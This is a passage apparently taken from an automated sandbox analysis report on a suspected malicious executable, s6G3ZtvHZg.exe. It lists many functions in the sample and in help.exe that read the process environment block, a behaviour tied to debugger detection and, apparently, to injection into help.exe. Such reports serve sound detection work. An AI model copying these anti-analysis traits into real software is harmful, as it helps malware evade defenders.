          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174766D mov eax, dword ptr fs:[00000030h]3_2_0174766D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]3_2_017FAE44
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]3_2_017FAE44
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFE3F mov eax, dword ptr fs:[00000030h]3_2_017EFE3F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173E620 mov eax, dword ptr fs:[00000030h]3_2_0173E620
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808ED6 mov eax, dword ptr fs:[00000030h]3_2_01808ED6
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]3_2_0176A61C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]3_2_0176A61C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01768E00 mov eax, dword ptr fs:[00000030h]3_2_01768E00
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1608 mov eax, dword ptr fs:[00000030h]3_2_017F1608
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017616E0 mov ecx, dword ptr fs:[00000030h]3_2_017616E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017476E2 mov eax, dword ptr fs:[00000030h]3_2_017476E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01778EC7 mov eax, dword ptr fs:[00000030h]3_2_01778EC7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017636CC mov eax, dword ptr fs:[00000030h]3_2_017636CC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFEC0 mov eax, dword ptr fs:[00000030h]3_2_017EFEC0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B46A7 mov eax, dword ptr fs:[00000030h]3_2_017B46A7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFE87 mov eax, dword ptr fs:[00000030h]3_2_017CFE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2ACB mov eax, dword ptr fs:[00000030h]14_2_02DF2ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2AE4 mov eax, dword ptr fs:[00000030h]14_2_02DF2AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]14_2_02DFD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]14_2_02DFD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]14_2_02DDAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]14_2_02DDAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFAB0 mov eax, dword ptr fs:[00000030h]14_2_02DFFAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]14_2_02E7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]14_2_02E7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98A62 mov eax, dword ptr fs:[00000030h]14_2_02E98A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0927A mov eax, dword ptr fs:[00000030h]14_2_02E0927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E54257 mov eax, dword ptr fs:[00000030h]14_2_02E54257
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8EA55 mov eax, dword ptr fs:[00000030h]14_2_02E8EA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE3A1C mov eax, dword ptr fs:[00000030h]14_2_02DE3A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]14_2_02DCAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]14_2_02DCAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]14_2_02E04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]14_2_02E04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov ecx, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD8A0A mov eax, dword ptr fs:[00000030h]14_2_02DD8A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]14_2_02E8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]14_2_02E8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]14_2_02E453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]14_2_02E453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEDBE9 mov eax, dword ptr fs:[00000030h]14_2_02DEDBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2397 mov eax, dword ptr fs:[00000030h]14_2_02DF2397
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E95BA5 mov eax, dword ptr fs:[00000030h]14_2_02E95BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFB390 mov eax, dword ptr fs:[00000030h]14_2_02DFB390
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]14_2_02DD1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]14_2_02DD1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8138A mov eax, dword ptr fs:[00000030h]14_2_02E8138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7D380 mov ecx, dword ptr fs:[00000030h]14_2_02E7D380
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCF358 mov eax, dword ptr fs:[00000030h]14_2_02DCF358
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB40 mov eax, dword ptr fs:[00000030h]14_2_02DCDB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]14_2_02DF3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]14_2_02DF3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98B58 mov eax, dword ptr fs:[00000030h]14_2_02E98B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB60 mov ecx, dword ptr fs:[00000030h]14_2_02DCDB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8131B mov eax, dword ptr fs:[00000030h]14_2_02E8131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC58EC mov eax, dword ptr fs:[00000030h]14_2_02DC58EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov ecx, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E090AF mov eax, dword ptr fs:[00000030h]14_2_02E090AF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9080 mov eax, dword ptr fs:[00000030h]14_2_02DC9080
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov ecx, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]14_2_02E43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]14_2_02E43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]14_2_02DE0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]14_2_02DE0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E82073 mov eax, dword ptr fs:[00000030h]14_2_02E82073
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91074 mov eax, dword ptr fs:[00000030h]14_2_02E91074
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]14_2_02E94015
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]14_2_02E94015
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E541E8 mov eax, dword ptr fs:[00000030h]14_2_02E541E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]14_2_02DCB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]14_2_02DCB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]14_2_02DCB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E469A6 mov eax, dword ptr fs:[00000030h]14_2_02E469A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2990 mov eax, dword ptr fs:[00000030h]14_2_02DF2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA185 mov eax, dword ptr fs:[00000030h]14_2_02DFA185
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]14_2_02E451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]14_2_02E451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]14_2_02E451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]14_2_02E451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEC182 mov eax, dword ptr fs:[00000030h]14_2_02DEC182
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]14_2_02DF61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]14_2_02DF61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]14_2_02DEB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]14_2_02DEB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]14_2_02DCB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]14_2_02DCB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC962 mov eax, dword ptr fs:[00000030h]14_2_02DCC962
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]14_2_02DC9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]14_2_02DC9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]14_2_02DC9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]14_2_02DF513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]14_2_02DF513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov ecx, dword ptr fs:[00000030h]14_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF36CC mov eax, dword ptr fs:[00000030h]14_2_02DF36CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7FEC0 mov eax, dword ptr fs:[00000030h]14_2_02E7FEC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E08EC7 mov eax, dword ptr fs:[00000030h]14_2_02E08EC7
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD76E2 mov eax, dword ptr fs:[00000030h]14_2_02DD76E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98ED6 mov eax, dword ptr fs:[00000030h]14_2_02E98ED6
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF16E0 mov ecx, dword ptr fs:[00000030h]14_2_02DF16E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E446A7 mov eax, dword ptr fs:[00000030h]14_2_02E446A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]14_2_02E90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]14_2_02E90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]14_2_02E90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FE87 mov eax, dword ptr fs:[00000030h]14_2_02E5FE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]14_2_02DD7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]14_2_02E8AE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]14_2_02E8AE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]14_2_02DEAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]14_2_02DEAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]14_2_02DEAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]14_2_02DEAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]14_2_02DEAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD766D mov eax, dword ptr fs:[00000030h]14_2_02DD766D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]14_2_02DFA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]14_2_02DFA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7FE3F mov eax, dword ptr fs:[00000030h]14_2_02E7FE3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]14_2_02DCC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]14_2_02DCC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]14_2_02DCC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF8E00 mov eax, dword ptr fs:[00000030h]14_2_02DF8E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81608 mov eax, dword ptr fs:[00000030h]14_2_02E81608
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCE620 mov eax, dword ptr fs:[00000030h]14_2_02DCE620
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E037F5 mov eax, dword ptr fs:[00000030h]14_2_02E037F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD8794 mov eax, dword ptr fs:[00000030h]14_2_02DD8794
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]14_2_02E47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]14_2_02E47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]14_2_02E47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98F6A mov eax, dword ptr fs:[00000030h]14_2_02E98F6A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDEF40 mov eax, dword ptr fs:[00000030h]14_2_02DDEF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDFF60 mov eax, dword ptr fs:[00000030h]14_2_02DDFF60
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEF716 mov eax, dword ptr fs:[00000030h]14_2_02DEF716
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]14_2_02DFA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]14_2_02DFA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]14_2_02E9070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]14_2_02E9070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFE730 mov eax, dword ptr fs:[00000030h]14_2_02DFE730
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]14_2_02DC4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]14_2_02DC4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]14_2_02E5FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]14_2_02E5FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E814FB mov eax, dword ptr fs:[00000030h]14_2_02E814FB
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]14_2_02E46CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]14_2_02E46CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]14_2_02E46CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98CD6 mov eax, dword ptr fs:[00000030h]14_2_02E98CD6
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD849B mov eax, dword ptr fs:[00000030h]14_2_02DD849B
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA44B mov eax, dword ptr fs:[00000030h]14_2_02DFA44B
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE746D mov eax, dword ptr fs:[00000030h]14_2_02DE746D
